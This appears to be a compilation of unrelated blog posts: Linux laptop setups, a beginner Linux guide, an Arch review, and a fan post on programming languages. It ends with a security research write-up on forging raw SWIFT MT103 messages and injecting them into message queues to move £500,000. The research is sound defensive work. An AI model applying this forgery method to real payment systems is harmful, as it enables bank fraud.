Well since we last spoke I am afraid I had to retire my Dell Inspiron M6800 (Mangelwurzel) as the sound card finally decided to give up. So that meant the touchpad, the sound card and the top pair of memory sockets had stopped working so it had to go.
I have recovered the two 480GB SSDs that it had, so I can reuse them in another project should the time come. However, as one machine exits stage right to the farm, luck would have it that I managed to get a new laptop.
The machine admittedly is another Dell laptop but this one is new. The machine in question is a Dell Inspiron 3525. It's a 15.6” laptop with a Ryzen 7 5200U with 16GB RAM, an Integrated Radeon Vega 8 graphics card, and a 1TB NVME drive.
Sure enough for the first 2 hours of its new existence, it did have a copy of Windows 11 Home (stop spitting at the back there). However, after a bit of learning how to get around the BIOS, I managed to install Endeavour OS Galileo (the latest version).
As I had an AMD graphics card (even if it’s integrated), I decided to run KDE Plasma (in the past I have run MATE but I thought I would change it up).
Now for the first few days I was running just the basic setup, but when I installed Steam only a few games would start. Terraria, Stardew Valley, and Starbound worked fine as they, I believe, use OpenGL. However, when I tried to run a game using Proton there was no dice, as Vulkan was not listed.
I had to install the version of Mesa with Vulkan from the extras, and then I could get Untitled Goose Game to run, including picking up my Xbox 360-style gamepad. However, Path of Exile and Pacman Championship Edition 2 both threw errors running the Linux native versions.
However, I then turned on Proton usage, and using the Windows versions both games worked without error. Strange but I am not going to argue they work and I am not going to question beyond that.
For some reason they work if it’s through DXVK but not through the actual Linux Vulkan driver go figure that. Considering I can now play them both fine I am not going to fight it.
Parkitect 1.9a works fine through Wine as it’s a GOG game version I am using.
I admit while I am not a huge game player it’s nice to see them in action.
I have also installed and tested various emulators the list includes Fuse (ZX Spectrum), VICE (c64), Caprice32 (Amstrad CPC), Atari800 (Atari 8 bit), and DOSBox-X (MSDOS). I will probably test a few more in time but all successful so far.
I even did my usual build of GDASH and it works fine. So I can play various incarnations of Boulder Dash should I ever feel so.
Set up OBS Studio, KDEnlive, VLC, Audacity, and more so it can be used to create videos or podcasts should the decision take me.
Also, Cairo-Dock is my choice of on-screen dock as it has been for many years. It’s pretty reliable and I can set it up pretty quickly now.
I have also installed some productivity apps in the form of LibreOffice, RedNotebook, Obsidian, and Focuswriter. I also installed InMyDiary via Wine as the Windows version is the most up-to-date one (I like Lotus Organiser and it looks/works the same).
So it has been running for over a week and I admit I am impressed with its capabilities.
However, it does seem the world of Linux is looking to dump X11 in favour of Wayland. Now on Mangelwurzel, I could not use Wayland as Nouveau could not run it.
But this new Dell (currently named Parsnip but could be subject to change) has a better graphics card and I have installed the version of KDE Plasma Wayland also.
So I can log out of X11 and switch to Wayland if necessary. It works and I admit speed-wise, it's slightly faster at program opening than X11, but Cairo Dock doesn’t support Wayland just yet.
However, I did manage to get a dock in the form of Latte Dock and it does work fine.
However, Steam doesn’t like Wayland; it works, but man is it slow and problematic, so at this time I still have the system boot into X11 and change up to Wayland should I need it.
So where do I go with this new Dell laptop? So far it has performed more than adequately. Also, EndeavourOS once again proves to be my preferred Linux flavour and I won’t be going back to a stable (Debian, Mint, Ubuntu) environment anytime soon unless forced.
Well, that’s a wrap for the moment… In turn, I will probably install MAME and maybe play with QEMU but that’s for the next episode should I get around to it.
Until next time… Take care.
1 note
·
View note
Text
(you might know some of this already, but I'm going in detail because it's not often I get to info-dump this to someone)
What linux is:
Linux is a free and open source operating system kernel -in itself it isn't a full Os, it needs other parts; if you want I can explain what a kernel is/does- made by Linus Torvalds in 1991, inspired by the Minix Os, a small Unix-like system written for teaching. Although linux isn't a full Os, people will generally refer to any Os that uses the linux kernel as "linux"
Since then it has become a major cornerstone of the internet. ~90% of servers online are running some kind of linux, although online surveys show that only 3-5% of people use linux as a desktop Os.
because linux is free and open source -meaning anyone can download or edit the source code- there are several distributions (or "distros") of linux you can download, each with different package managers (the tool you use to download new software), desktop environments (which determine what apps you have installed and how your desktop looks), and other stuff. Some linux distros are based on others and they may have some things in common. For example: all distros based on Debian use Debian's "apt" package manager.
Because all linux distros are based on the same kernel (it's not often that distros mod the kernel, for various reasons) most (not all) software is compatible between distros with a little finagling.
How to install linux:
installing linux may vary from computer to computer, and on some computers it is nearly impossible; although in theory anything with 512 mb of ram could run linux. A lot of these details may be different on your computer, so look into that first.
find a distro you want to use. Some distros I'd advise staying away from if you are a beginner, like Arch. There are tons of distros out there so it may seem like a daunting task, but here are a good few recommendations for beginners. Linux Mint is a good place to start, it's basically the beginner distro. it's simple, works with most computers, and suits just about anyone, from long time users to beginners, to shitty little cousins. Pop_OS! is another good one I've seen recommended, I've never used it personally but I've heard good things. For a long time Ubuntu (mint's daddy in a sort of way) was considered one of the best general distros, but in recent years it has kind of fallen off, but still, it's good to keep in mind as a backup if something goes wrong.
make a bootable usb thumb drive. to do this you have to download the iso of the OS you are going to use and use flashing software to make the usb bootable. Don't just put the iso on a thumb drive like what I did when I first installed linux, make sure you are using flashing software. Rufus is a good flashing software for Windows (assuming that is what you're using). here is a good article on how to make a bootable usb
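before flashing, it's worth verifying the download. a sketch of the checksum step with sha256sum (demo filenames here; substitute your real .iso and the checksum file from the distro's website):

```shell
# demo of verifying a download with sha256sum
# in real life "demo.iso" is your downloaded .iso and "sha256sum.txt"
# is the checksum file published by the distro
echo "pretend this is an ISO" > demo.iso
sha256sum demo.iso > sha256sum.txt   # normally you download this file
sha256sum -c sha256sum.txt           # prints "demo.iso: OK" on a match
```

if it reports FAILED instead, the download is corrupt, so re-download before flashing.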
go into a one time boot/bios. the next thing you need to do is boot your computer from the usb. which can be done by rearranging the boot order in the bios, or running a one time boot on your computer. this is where things start to change depending on your computer. for most computers if you reboot you will see a little screen flash that may have some technical info and say something like "[key] for bios/uefi setup [key] for one-time boot launch." On my computer those keys are f2 and f12 respectively, but it may be different on yours. Some computers *ahem chromebook* may not give you access to the bios or one time boot. Here is a guide on common ways on how to boot into bios/one time boot. although I recommend looking up your laptop model/mother board model for specific details.
boot from the usb. now that you are in the bios/boot utility you need to boot into the usb. when booted into the usb, most distro's will allow you to test how performance is on your computer, test the desktop environment, and make sure you have all your drivers and other things worked out so you have access to wifi and bluetooth and stuff.
run the installer. on the desktop there should be an installer application that you can run, most of them are pretty simple; they will just ask you stuff like usernames, times zones, pre-installed apps, etc. etc. WARNING: installing linux will wipe your drive clean, anything you had will be gone. Make sure you have backups of anything that may be important.
reboot your computer & unplug the usb; after you run the installer linux should be on your computer now
many distro's have installation guides on their websites if you want to follow those.
if you want to install linux on a chromebook it is possible (my first laptop was a chromebook and I installed Solus on it, it was my first distro and a big regret; nothing against Solus, I just didn't like it). here are some resources if you want to do that: [1] [2] [3]
How to use linux:
one of the big cornerstones of linux is the terminal. due to its development history the terminal is the dominant way to interact with your computer. a lot of distros may have a way to do things with a gui, but you will always have a terminal, so you best get used to it.
this is what a terminal emulator looks like. Terminals are technically a part of the hardware (and can be found under /dev/tty* in linux), but you can access them from the desktop through the emulator.
on the terminal you will be greeted with a command prompt, from here you can type out different commands. when you type a command the shell (the software that the terminal uses to communicate with the OS) will search through the $PATH variable and check every folder it points to, and if the command you typed is found then it will run the command with whatever parameters you give.
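you can watch that $PATH lookup yourself; these are safe to run on any distro:

```shell
echo "$PATH"     # the colon-separated list of folders the shell searches
command -v ls    # the full path where the "ls" command was found
type ls          # same lookup, with a short description
```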
commands follow a formula: CommandName parameter1 parameter2 ...
some commands wont have any parameters, others will, it all depends on the command. But here are some common commands to help you understand
before you begin, just know that "~" refers to your home folder; directory is just a fancy term for folder (that is due to the history of computers); "." refers to the directory you are currently in, and ".." refers to the directory above you.
ls (list): lists the contents of whatever folder you're in
pwd (print working directory): prints the file path to your folder (ex: /home/uppereepy/Documents)
cd (change directory): lets you change which folder you're in (ex: cd ..)
cat (concatenate): concatenates (prints) files to the screen
mv (move): move files to new locations (ex: mv HelloWorld.txt ~/Desktop), can also be used to rename files (ex: mv HelloWorld.txt Hello.txt)
man (manual): if you don't know what a command does then you can use the man command to look up what a command does (ex: man ls).
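putting those together, a first practice session might look like this (it makes a throwaway "practice" folder in your home directory):

```shell
cd ~                                  # start in your home folder
pwd                                   # print where we are
mkdir -p practice                     # make a folder to play in
cd practice
echo "hello world" > HelloWorld.txt   # create a small file
ls                                    # the new file should be listed
cat HelloWorld.txt                    # prints: hello world
mv HelloWorld.txt Hello.txt           # mv doubles as rename
ls                                    # now shows Hello.txt instead
cd ..                                 # ".." takes you back up a level
```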
some advice: you will grow to understand the terminal in time, and although tutorials will help, using the terminal will help you understand things a lot more. manual entries, when you first start, may seem esoteric and hard to read, so just know it is ok to look up what a command does on the internet. learning the C programming language can really help you understand the terminal, and so does reading about the history of computers or using older computers
Resources to get started:
Wikipedia page for linux · computer terminals · The GNU project · top 50 commands · how to use pipes · online manual · linux for beginners (yt) · linux for hackers by NetworkChuck (he is a little annoying, but he's how I got started)
and if you want to get into the history of computers I'd suggest looking into The 8-bit Guy on yt and Unix: A History and a Memoir by Brian Kernighan (one of the developers behind Unix and co-author of "The C Programming Language")
anyways, that's all I got, I am tired (it is nearly 12:00 am while I am writing this), sorry for the extremely long post
gee i really want to get into linux but idk how to even start.. I wonder if there are any smart transgender women out there who could explain it to me in extreme detail while i bat my eyes at them.....
#long post#linux#linuxposting#really long post#linux mint#Pop_OS!#linux for beginners#information#infodump
606 notes
·
View notes
Text
I use Arch, BTW
I made the switch from Ubuntu 23.04 to Arch Linux. I embraced the meme. After over a decade since my last failed attempt at daily driving Arch, I'm gonna put this as bluntly as I can possibly make it:
Arch is a solid Linux distribution, but some assembly is required.
But why?
Hear me out here, Debian and Fedora family enjoyers. I have long had the Debian family as my go-to distros, and I also swallowed the RHEL pill and switched my server over from Ubuntu LTS to Rocky Linux on another machine. More on that in a later post when I'm more acclimated with it. But for my personal primary laptop, a Dell Latitude 5580, the reason for switching was ultimately Canonical's decision to move commonly used applications, particularly the web browsers, exclusively to Snap packages, plus the additional overhead and just plain weird issues that came with those being containerized instead of running on the bare metal. Now I understand the reason for this move from deb repo to Snap, but the way Snap implements these kinds of things just leaves a sour taste in my mouth, especially compared to its alternative from the Fedora family, Flatpak. So for what I needed and wanted, something up to date and with good support and documentation where I didn't have to deal with one particular vendor's bullshit, I really only had 2 options: Arch and Gentoo (Fedora is currently dealing with some H264 licensing issues and quite honestly I didn't want to bother with that for 2 machines).
Arch and Gentoo are very much the same but different. And ultimately Arch won over the 4chan /g/ shitpost that has become Gentoo Linux. So why Arch? Quite honestly, time. Arch has massive repositories of both Arch-team-maintained and community software, with the majority of what I need already packaged in binary form. Gentoo is much the same way, minus the precompiled binary aspect, as the Portage package manager downloads source code packages and compiles things on the fly specifically for your hardware. While yes, this can make things perform better than precompiled binaries, the reality is the difference is negligible at best and placebo at worst depending on your compiler settings. I can take a weekend to install everything and do the fine tuning, but if half or more of that time is just waiting for packages to compile, no thanks. That plus the massive resource that is the Arch User Repository (AUR) made Arch a no-brainer, and vanilla Arch was probably the best way to go. It's a Lego set vs 3D printer files and a list of hardware to order from McMaster-Carr to screw it together, metaphorically speaking.
So what's the Arch experience like then?
As I said in the intro, some assembly is required. To start, the installer image you typically download is incredibly barebones. All you get is a simple bash shell as the root user in the live USB/CD environment. From there we need to do 2 things: 1) get the thing online, where the nmcli command came in handy as this is a laptop I primarily use wirelessly, and 2) run the archinstall script. At the time I downloaded my Arch installer, archinstall was broken on the base image, but you can update it with a quick pacman -S archinstall once you have it online. archinstall does pretty much all the heavy lifting for you; you can choose all the primary options: desktop environment/window manager, boot loader, audio system, language options, the whole works. I chose Gnome, the GRUB bootloader, the Pipewire audio system, and EN-US for just about everything. Even then, it's a minimal installation once you're done.
Post-install experience is straightforward, albeit repetitive. Right off the archinstall script what you get is relatively barebones, a lot more barebones than I was used to with Ubuntu and Debian Linux. I was seemingly constantly missing one thing or another, checking the wiki, checking the AUR, asking friends who had been using Arch for even longer than I have how to address dumb issues. Going back to the Lego set analogy, archinstall is just the first bag of a larger set. It is the foundation on which you can make it your own. Everything after that point is the second and onward parts bags: all of the additional media codecs, supporting applications, visual tweaks like a boot animation instead of text-mode verbose boot, and things that most distributions such as Ubuntu or Fedora have off the rip, you have to add on yourself. This isn't entirely a bad thing though, as at the end you're left with what you need and at most very little of what you don't. Keep going through the motions, one application at a time, pulling from the standard pacman repos, AUR, and Flatpak, and eventually you'll have a full-fledged desktop with all your usual odds and ends.
And at the end of all of that, what you're left with is any other Linux distro. I admit previously I wrote Arch off as super unstable and only for the diehard masochists after my last attempt at running Arch when I was a teenager went sideways, but daily driving it on my personal Dell Latitude for the last few months has legitimately been far better than any recent experiences I've had with Ubuntu now. I get it. I get why people use this, why people daily drive this on their work or gaming machines, why people swear off other distros in favor of Arch as their go to Linux distribution. It is only what you want it to be. That said, I will not be switching to Arch any time soon on mission critical systems or devices that will have a high run time with very specific purposes in mind, things like servers or my Raspberry Pi's will get some flavor of RHEL or Debian stable still, and since Arch is one of the most bleeding edge distros, I know my chance of breakage is non zero. But so far the seas have been smooth sailing, and I hope to daily this for many more months to come.
39 notes
·
View notes
Note
I've seen a couple people talk about Linux. Is it worth it for someone who basically uses their laptop like an app machine? I play don't starve together, I have firefox, and I write, aaannnnnd that's about it. It slows down sometimes when I'm playing different games but I always thought that was what I get for not having the space, or the desk, for a desktop.
Oh, you are actually the ideal candidate.
If you primarily use your computer for web browsing, media consumption, office work and/or steam games, you are THE target audience for Linux desktop OSes.
The only people who I wouldn't recommend make the jump are people who do very specialized art, like 3D modelling and animation from scratch (blender works on linux but little else in that field), and people who do high end or competitive gaming without the use of steam.
I keep specifying steam, because the steam launcher has a bunch of whateverthefuck going on that makes it basically trivial to run steam supported games on linux. They even provide the setting for it inside the linux version of Steam, called "proton compatibility layer." Which is very roughly versions of all the files that a game would normally be able to call from the windows OS, only with linux information in them. So there's very little impact on hardware performance.
There can even be improvements in performance because the actual operating system is so lightweight that there are more hardware resources available to the game.
Personally, I find that the thing that is the most improved in terms of response is actually Firefox. On Windows, launching Firefox always took me upwards of 10 seconds. Once open, it worked like a dream, but for whatever reason Windows hated actually opening the program for me.
On linux, it's instant. If there's a loading speed, it's too short for me to notice in the time it takes to move my eyes from the firefox option in the start menu, to the center of the screen where the window actually opens.
Plus, and this is something I LOVE for using linux as an "app machine," the linux software manager actually works. If you've ever used an app store on your phone, a software manager is basically the same thing. You install programs from it, and then it updates and secures them automatically for you.
Compare that to windows, where most programs need to be downloaded as .exe files from the developer, then installed manually by you, then either you check for updates on the website manually or the program checks automatically whenever it opens, and then you have to download a whole other fucking exe file to run the update.
None of that bullshit.
You install it in the software manager and then any time your computer runs system updates, it will also update all the software.
Fucking magnificent. I live for that shit. In fact, it's such an integral feature and so much better from a use perspective that windows tried to re-create it with the windows store. Only their version sucks ass and has like no fucking useful programs. So then windows users tried to re-create it with a system called Chocolatey Software Management For Windows. And, credit where it is due, if a program has choco support it does work beautifully!
It's just that very few programs do.
Meanwhile, back on linux, they even introduced a feature called flatpacking that allows people who make programs to basically just.... pop it into the software store, so even weird shit like the specific game mod for FFXIV that I personally use has its own software manager entry.
Anyway, okay, TLDR:
You are literally, almost as if divinely crafted, the ideal kind of user for switching to Linux.
I like Linux Mint in XFCE, but many people swear that Ubuntu is the place to start. Which one I recommend to you would come down to whether you prefer the "feel" and "look" of older windows like XP and 7, or MacOS and newer Windows like 11. For the older style, do Mint. For the newer, try Ubuntu.
#I really have just become a Linux Guy haven't I#Linux Mint#XFCE#Ubuntu#Lubuntu#Kubuntu#(Those are different types of Ubuntu)#Linux#God help me#Also to the people reading this and thinking THAT IS NOT WHAT A FLATPAK IS!!!!#or THAT IS NOT HOW CHOCO UPDATER WORKS#Or whatever else#Please understand that I am hypersimplifying because???? NONE OF THAT IS RELEVENT
NXX Members with Coding Languages I Think They Would Enjoy
In which I use some of my vague knowledge for entertainment purposes :D
WC: 0.7K
MC/Rosa: the building blocks in Scratch
Whatever MC does, she gives it her all and coding is no exception!
I'm thinking she'll likely start small and build from there (pun unintended), and that she'll probably take a lot of enjoyment from the puzzle-shaped pieces in Scratch
She's learning the foundation to writing programs!
Soon she will be able to master every language and become an expert in all things programming
Luke: Command line / Python
Command line isn't exactly a coding language per se, but if Luke did have a favorite language, I think it'd be Python (although I think he can comfortably code in multiple languages since he can easily hack into the Big Data Lab!)
I'm saying Python partly because I'm biased, but also because Python offers syntax that is easy to read and also fairly simple to write -- because of said less complicated syntax
Also, snek! A young Luke sees that the language is named after a Cool Reptile and says, "yeah I'm gonna go learn that right now"
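(For the curious, the readable-syntax point is easy to show with a toy snippet - the reptile theme here is mine, not anything official:)

```python
# A toy example of Python's readable syntax: indentation instead of
# braces, and no semicolons required.
def cool_reptiles(names):
    """Return only the names that belong to a Cool Reptile."""
    return [name for name in names if name == "python"]

print(cool_reptiles(["python", "cobra", "mamba"]))  # → ['python']
```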
Moving on to the Not A Coding Language: Command line (could be Windows, Linux, whatever they have in Stellis)
Luke is the kind of person who likes taking things apart, building them back together again, but it's not the same as before oh no you'll find that your toaster is not an ordinary toaster anymore, it also triples as an inkjet printer and a metal detector!
With any kind of command line interface he's allowed to go crazy with an electronic device! He used to have a cheat sheet of all the commands next to him but NOT ANYMORE, he's memorized them after hours of playing around with them (and if he forgets anything, there's probably a command along the line of /help that he can type in to get the information he's looking for)
Artem: CoffeeScript
While Artem likes JavaScript well enough, he enjoys the simplicity of CoffeeScript
Because CoffeeScript is essentially just JavaScript with nicer syntax (or as the CoffeeScript website puts it, "an attempt to expose the good parts of JavaScript in a simple way.")
Also, it has coffee in the name and while he's not going to admit it, it's hard to resist (and coffee is pretty on brand for him)
If Artem is in the mood for curly brackets, he can switch to JavaScript fairly easily, but he's very comfortable with CoffeeScript, even if it does raise eyebrows at times due to its status as a lesser known language
"CoffeeScript?" Celestine asks. "Is that a real thing?"
"Yes," Artem says, and quotes the CoffeeScript website: "It's just Javascript."
Vyn: C or C++
Because Vyn is insane
That's it. That's my reasoning
I think other than C or C++, Vyn might like SQL? That's the database language for managing/sorting data and who knows? He might like that. Might find it relaxing, even
But back to C!
Vyn falls in love with C by first going through the full experience of pain: the missing semicolons, the dropped bracket, each and every skipped indentation
But C can be used for loads of things, I mean it's been around for approximately 50 years and heaps of things are coded in C
And Vyn knows, that when he's mastered it
He will be unstoppable
Marius: LOLCODE
I have been waiting for the day I can finally bring up this coding language, and today is that day!
Because tell me Marius von Hagen would not have the utmost pleasure beginning programs with HAI and ending them with KTHXBYE
Tell me he wouldn't enjoy loops that are essentially written as IM IN YR LOOP and IM OUTTA YR LOOP (rather than the conventional phrasing for while and for loops)
While I don't have enough knowledge to write in LOLCODE, I still find it hilarious and I think Marius would have a blast just playing around with the commands
Other than LOLCODE, I think Marius would like CSS (and maybe even HTML, they go hand in hand)! It can be a pain sometimes but the possibilities are next to endless (making things pretty with computer language? Seems like it could be right up his alley)
Side note on Vyn and C/C++: I have the utmost respect for people who can write in C, because I have struggled with it -- although honestly maybe that's because I don't spend enough time learning it (and because Python 3 is my favorite haha)
Edit: to all the people in the tags who said Luke would like Java, yes you are completely right I just know next to nothing about Java :')
#tears of themis#let me be a nerd for a quick second#yes I am indeed talking about programming languages today#sam wherever you are I think you might enjoy this#luke pearce#artem wing#vyn richter#marius von hagen#mc | rosa
TLDR: With a bit of research and support we were able to demonstrate a proof of concept for introducing a fraudulent payment message to move £0.5M from one account to another, by manually forging a raw SWIFT MT103 message, and leveraging specific system trust relationships to do the hard work for us!
Before we begin: This research is based on work we performed in close collaboration with one of our clients; however, the systems, architecture, and payment-related details have been generalized / redacted / modified so as not to disclose information specific to their environment.
With that said.. *clears throat*
The typical Tactics, Techniques and Procedures (TTPs) against SWIFT systems we see in reports and the media are - for the most part - the following:
Compromise the institution's network;
Move laterally towards critical payment systems;
Compromise multiple SWIFT Payment Operator (PO) credentials;
Access the institution's SWIFT Messaging Interface (MI);
Key in - and then authorize - payment messages using the compromised PO accounts on the MI.
This attack-path requires the compromise of multiple users, multiple systems, an understanding of how to use the target application, bypass of 2FA, attempts to hide access logs, avoid alerting the legitimate operators, attempts to disrupt physical evidence, bespoke malware, etc. – so, quite involved and difficult. Now that’s all good and fine, but having reviewed a few different payment system architectures over the years, I can’t help but wonder:
“Can't an attacker just target the system at a lower level? Why not target the Message Queues directly? Can it be done?”
Well, let's find out! My mission begins!
So, first things first! I needed to fully understand the specific "section" of the target institution's payment landscape I was going to focus on for this research. In this narrative, there will be a system called "Payment System" (SYS). This system is part of the institution's back-office payment landscape, receiving data in a custom format and outputting an initial payment instruction in ISO 15022 / RJE / SWIFT MT format. The reason I sought this scenario was specifically because I wanted to focus on attempting to forge an MT103 payment message - that is:
MT – “Message Type” Literal;
1 – Category 1 (Customer Payments and Cheques);
0 – Group 0 (Financial Institution Transfer);
3 – Type 3 (Notification);
All together this is classified as the MT103 “Single Customer Credit Transfer”.
Message type aside, what does this payment flow look like at a high level? Well I’ve only gone and made a fancy diagram for this!
Overall this is a very typical and generic architecture design. However, let me roughly break down what this does:
The Payment System (SYS) ingests data in a custom - or alternative - message format from its respective upstream systems. SYS then outputs an initial payment instruction in SWIFT MT format;
SYS sends this initial message downstream to a shared middleware (MID) component, which converts (if necessary) the received message into the modern MT format understood by SWIFT - essentially a message broker used by a range of upstream payment systems within the institution;
MID forwards the message in its new format on to the institution's Messaging Interface (let's say it's SAA in this instance) for processing;
Once received by SAA, the message content is read by the institution's sanction screening / Anti-money laundering systems (SANCT).
Given no issues are found, the message is sent on to the institution's Communication Interface (SWIFT Alliance Gateway), where it's then signed and routed to the recipient institution over SWIFTNet.
OK, so now I have a general understanding of what I'm up against. But if I wanted to exploit the relationships between these systems to introduce a fraudulent payment without targeting any payment operators, I was going to need to dig deeper and understand the fundamental technologies in use!
So how are these messages actually 'passed' between each system? I need to know exactly what this looks like and how its done!
More often than not, Message Queues (MQ) are heavily used to pass messages between components in a large payment system. However, there are also various "Adapters" that may be used between systems communicating directly with the SAG (such as SAA or other bespoke / 3rd-party systems). These are typically the:
Remote API Host Adapter (RAHA);
MQ Host Adapter (MQHA);
Web Services Host Adapter (WSHA).
Having identified that MQ was in use, my initial assumption was that there was most likely a dedicated Queue Manager (QM) server somewhere hosting various queues that systems push and pull messages from. However, due to SWIFT CSP requirements, this would most likely - at a minimum - take the form of two Queue Managers: one which manages the queues within the SWIFT Secure Zone, and another that manages queues for the general corporate network and back-office systems.
Let's update that diagram to track / represent this understanding: Now I could research how this 'messaging' worked!
There are multiple ways to configure Message Queues architectures, in this case there were various dedicated input and output queues for each system, and the message flow looks something like this: Full disclosure, turns out it’s hard to draw an accurate - yet simple - MQ flow diagram (that one was basically my 4th attempt). So it’s.. accurate 'enough' for what we needed to remember!
Now I had a good understanding of how it all worked, it is time to define my goal: 'Place a payment message directly on to a queue, and have it successfully processed by all downstream systems'.
This sounds simple, just write a message to a queue, right? But there are a few complications!
Why are there few indications of this attack vector in the wild?
How do I even gain “write” access to the right queue?
What protects the message on the queues?
What protects the messages in transit?
What format are the messages in?
What is the correct syntax for that message format at any particular queue (0 margin for error)?
Where does PKI come in? How / where / when are the messages signed?
Can I somehow get around the message signing?
What values in the messages are dependent / controlled / defined by the system processing them (out of my control)?
What is the maximum amount I can transfer using Straight Through Processing, without alerting the institution / requiring manual validation?
But OK, there's no point dwelling on all of that right now, I'll just clearly define what I want to do! The goal:
Successfully write a payment instruction for 500,000 GBP;
Inject that message directly onto a specific queue;
Have the message pass environment-specific validation rules;
Have the message pass sanctions and AML checks;
Have the message successfully signed;
Have the message pass SWIFTNet-specific validation rules;
What I was not interested in doing for this research - yet needed to understand nevertheless for a full attack chain - was:
How to compromise the institution's network;
How to gain access to the MQ admin's workstation;
How to obtain the pre-requisite credentials.
What I wanted to 100% avoid at all costs:
The attack involving SWIFT payment operators in any way;
The attack involving SWIFT application access in any way;
A need to compromise signing keys / HSMs;
A need to compromise SWIFTNet operator accounts or certificates or any type of PKI.
Now I had an idea of what to do, I needed to make sure I could write a raw MT103 payment instruction! Typically, even when operators write payment messages using a messaging interface application like Alliance Access, they only really write the message “body” via a nice GUI. As raw data this could look something like:
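Based on the field breakdown in the table that follows, the raw body would have looked roughly like this (a reconstruction, not necessarily character-for-character what was used):

```
:20:TRANSACTIONRF103
:23B:CRED
:32A:200102GBP500000,00
:33B:GBP500000,00
:50K:/GB22EBNK88227712345678
JOHN DOE
JOHN'S BUSINESS LTD
21 JOHN STREET, LONDON, GB
:59:/FR20FBNK88332287654321
ALICE SMITH
ALICE'S COMPANY
10 ALICE STREET, PARIS, FR
:70:12345-67890
:71A:SHA
```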
I'll break this down in the following table:
Transaction Reference (20) – TRANSACTIONRF103
Bank Operation Code (23B) – CRED (message is to 'credit' some beneficiary)
Value Date / Currency / Amount (32A) – 200102 (02/01/2020) GBP 500,000.00
Currency / Original Credit Amount (33B) – GBP 500000,00 (£500,000.00)
Ordering Customer (50K) – GB22EBNK88227712345678 (IBAN); JOHN DOE (Name); JOHN'S BUSINESS LTD (Line 1); 21 JOHN STREET, LONDON, GB (Line 2)
Beneficiary (59K) – FR20FBNK88332287654321 (IBAN); ALICE SMITH (Name); ALICE'S COMPANY (Line 1); 10 ALICE STREET, PARIS, FR (Line 2)
Remittance Information (70) – 12345-67890 (essentially a payment reference)
Details of Charge (71A) – SHA (shared charge between sender and receiver)
Now as this is a valid message body, if I were targeting a payment operator on SWIFT Alliance Access, I could - for the 'most' part - simply paste the message into SAA's raw message creation interface and I'd be pretty much done. With the exception of adding the sender / recipient BIC codes and most likely selecting a business unit. However, these values are not stored in the message body. Not stored in the message body you say? Well that complicates things! Where are they stored exactly?
The message “body” is referred to as “block 4” (aka the “Text Block”) within the SWIFT MT standard. As suggested by the name, there is probably also a block 1-3. This is correct; and these blocks are typically generated by the payment processing applications - such as SWIFT Alliance Access - and not necessarily input by the operators. A 'complete' MT103 message consists of 6 blocks:

Block 1 – Basic Header
Block 2 – Application Header
Block 3 – User Header
Block 4 – Text Block
Block 5 – Trailer
Block 6 – System block
So it looked like I was going to need to learn how to craft these various “blocks” from scratch.
Block 1 (Basic header)
Reading through some documentation, I crafted the following “Basic header” block:
A breakdown of what this translates too is as follows:
Basic Header Flag – 1 – Block 1 (not 2, 3, 4, or 5)
Application Type – F – FIN application
Message Type – 01 – 01 = FIN (i.e. not ACK/NACK)
Sender BIC – EBNKGB20 – EBNK (bank code), GB (country code), 20 (location code)
Sender Logical Terminal – A – Typically A, unless they are a significantly large institution and require multiple terminals
Sender Branch – XXX – All X if no branch needed
Session Number – 0000 – The session number for the message
Sequence Number – 999999 – The sequence number of the message
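As a quick sanity check, this header can be assembled in a few lines of Python (a sketch of my own; the session and sequence numbers are simple placeholders here):

```python
# Sketch: assembling the Basic Header (block 1) from the fields above.
# Session and sequence numbers are placeholders - the real values turn
# out to be application-specific.
def basic_header(bic, terminal="A", branch="XXX",
                 session="0000", sequence="999999"):
    return "{1:F01" + bic + terminal + branch + session + sequence + "}"

print(basic_header("EBNKGB20"))  # → {1:F01EBNKGB20AXXX0000999999}
```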
Taking a step back, I already identified two potential problems: the “session” and “sequence” numbers! These are described as follows:
Session Number – Must also equal the current application session number of the application entity that receives the input message.
Sequence number – The sequence number must be equal to the next expected number.
Hmmm, at this point I was not sure how I could predetermine a valid session and/or sequence number, considering they seemed to be application- and 'traffic'-specific. But there was nothing I could do at the time, so I noted it down in a list of 'issues/blockers' to come back to later.
Block 2 (Application Header)
A bit more dry reading later, I managed to also throw together an application header:
Again, I’ve broken this down so it makes sense (if it didn’t already; I’m not one to assume):
Application Header Flag – 2 – Block 2
I/O Identifier – I – Input message (a message being sent)
Message Type – 103 – 103 = Single Customer Credit Transfer
Recipient BIC – FBNKFR20 – FBNK (bank code), FR (country code), 20 (location code)
Recipient Logical Terminal – X – All General Purpose Application messages must use 'X'
Recipient Branch – XXX – All General Purpose Application messages must use 'XXX'
Message Priority – N – Normal (not urgent)
Awesome! No issues crafting this header!
Note: At this point I should probably mention that these BIC codes are not 'real'; however, they are accurate in terms of format and length.
Block 3 (User Header)
The third block is called the "User Header" block, which can be used to define some "special" processing rules. By leveraging this header, I could specify that the message should be processed using "Straight Through Processing" (STP) rules, which essentially attempt to ensure that the message is processed end-to-end without human intervention. This could be specified as follows:
However, this was not yet a valid header! As of November 2018 the user header requires a mandatory “Unique end-to-end transaction reference” (UETR) value, which was introduced as part of SWIFT's Global Payments Innovation initiative (gpi)! This is a Globally Unique Identifier (GUID) compliant with the 4th version of the generation algorithm used by the IETF standard 'RFC4122'. This consists of 32 hexadecimal characters, divided into 5 parts by hyphens as follows:
where:
x – any lowercase hexadecimal character;
4 – fixed value;
y – either: 8, 9, a, b.
This value can be generated using Python as seen below:
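A minimal version using Python's standard uuid module (the library call is standard; the specific value below is just an example):

```python
import uuid

# uuid4() produces an RFC 4122 version 4 UUID - the format required
# for the UETR carried in field 121.
uetr = str(uuid.uuid4())
print(uetr)  # e.g. 8b1b42b5-669f-46ff-b2f2-c21f99788834
```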
With an acceptable UETR generated, this is how the third block looked:
And as before, a breakdown can be found below:
User Header Flag – 3 – Block 3
Validation Flag – 119 – Indicates whether FIN must perform any type of special validation
Validation Field – STP – Requests the FIN system to validate the message according to straight through processing principles
UETR Field – 121 – Indicates the unique end-to-end transaction reference value
UETR Value – 8b1b42b5-669f-46ff-b2f2-c21f99788834 – Unique end-to-end transaction reference used to track the payment instruction
Block 5 and 6 (Trailer and System Blocks)
I’ve already discussed “block 4” (the message body), so to wrap this section up, I'll be looking at the final 2 blocks: Block 5, aka the “Trailer”; and block S, aka the “System” block.
Before going forward, let me take a moment to explain the pointlessly complicated concept of input and output messages:
An “input” message (I) is a message which is traveling “outbound” from the institution. So this is a message being “input” by an operator and sent by the institution to another institution.
An “output” message (O) is a message which is traveling “inbound” to the institution. So this is a message being “output” by SWIFTNet and being received by the institution.
OK, moving swiftly (aaaahhhhh!) on.
